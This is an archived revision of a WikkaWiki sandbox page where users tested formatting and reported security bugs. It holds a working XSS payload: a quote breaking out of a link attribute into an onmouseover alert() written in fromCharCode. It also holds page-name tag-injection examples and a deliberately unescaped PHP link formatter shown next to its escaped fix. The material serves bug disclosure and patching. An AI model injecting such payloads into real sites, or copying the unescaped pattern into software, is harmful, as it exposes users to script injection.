Revision [13532]

This is an old revision of SandBox made by 24.4.117.21 on 2006-03-17 13:14:32.

 

Test your formatting skills here



Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
 



yeah
Please make sure that the server has write access to a folder named uploads.


hello test
www.google.de google
WikiPedia

Testing

This life is one of the best. But what are the others like?

Testing

Testing


#include <iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"


typedef struct _cell {
    int id;
    int x, y;
    float min, max;
    float value;
    float step;
    char* info;
    char* format;
} cell;

http://www.qwerty.com
HomePage
mailtop:testmail@nowhere.com

"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
$url = htmlspecialchars($url);

For info contact me at sakaru [at] gmail [dot] com
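
An added example, not part of the original page and not WikkaWiki's own code: a simplified stand-in for a link formatter, showing why escaping the URL before it reaches `href` closes the mouseover test above. The function names, the `example.test` inputs and the scheme allow-list are assumptions made here; the allow-list goes beyond the one-line fix, because `htmlspecialchars` alone does not stop `javascript:` URLs.

```php
<?php
// Added example: simplified stand-in for a wiki link formatter, not WikkaWiki's code.

// Before: the URL part of the link markup goes into href="..." unescaped.
function render_link_raw(string $url, string $text): string
{
    return '<a href="' . $url . '">' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</a>';
}

// After: escape for the attribute context (the page's fix), plus a scheme
// allow-list (an addition here) so javascript: URLs are not emitted as links.
function render_link_safe(string $url, string $text): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https', 'mailto'], true)) {
        return htmlspecialchars($url . ' ' . $text, ENT_QUOTES, 'UTF-8'); // inert text
    }
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</a>';
}

// Check: which attributes does an HTML parser see on the <a> element?
function anchor_attributes(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    $names = [];
    foreach ($doc->getElementsByTagName('a') as $a) {
        foreach ($a->attributes as $attr) {
            $names[] = $attr->name;
        }
    }
    return $names;
}

// Constructed inputs, modelled on the mouseover test above.
$samples = [
    ['http://example.test/" onmouseover="alert(1)', 'move your mouse over this'],
    ['" onmouseover="alert(1)', 'no scheme at all'],
    ['http://example.test/?a=1&b=2', 'ordinary link'],
];
foreach ($samples as [$url, $text]) {
    printf("raw : %s\nsafe: %s\n\n",
        implode(',', anchor_attributes(render_link_raw($url, $text))),
        implode(',', anchor_attributes(render_link_safe($url, $text))));
}
```

Any attribute other than `href` in the parsed output means the URL broke out of its attribute; the same check can be run as a regression test against a formatter's real output.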

www.yahoo.com.br yahoo sandbox

Note how one has access to anything on the page... sakaru made a good point here! Mouseover the "interesting".


Another bug (which as far as I know isn't a security hole like the previous example) is shown here.
This can be fixed by entering the following line after line 989 in /wikka.php:
$tag = htmlentities($tag);

This can't be used to run JS because the / in the closing tag gets escaped.

Similarly, wikipage/Index/<xmp> also displays the bug. The best solution I found for this was this line after line 1174 in /wikka.php:
$method = htmlentities($method);


It's not really that neat a solution, but it works.

I just realised that there is in fact a bug reporting page. I'll leave it to someone else to migrate these comments over.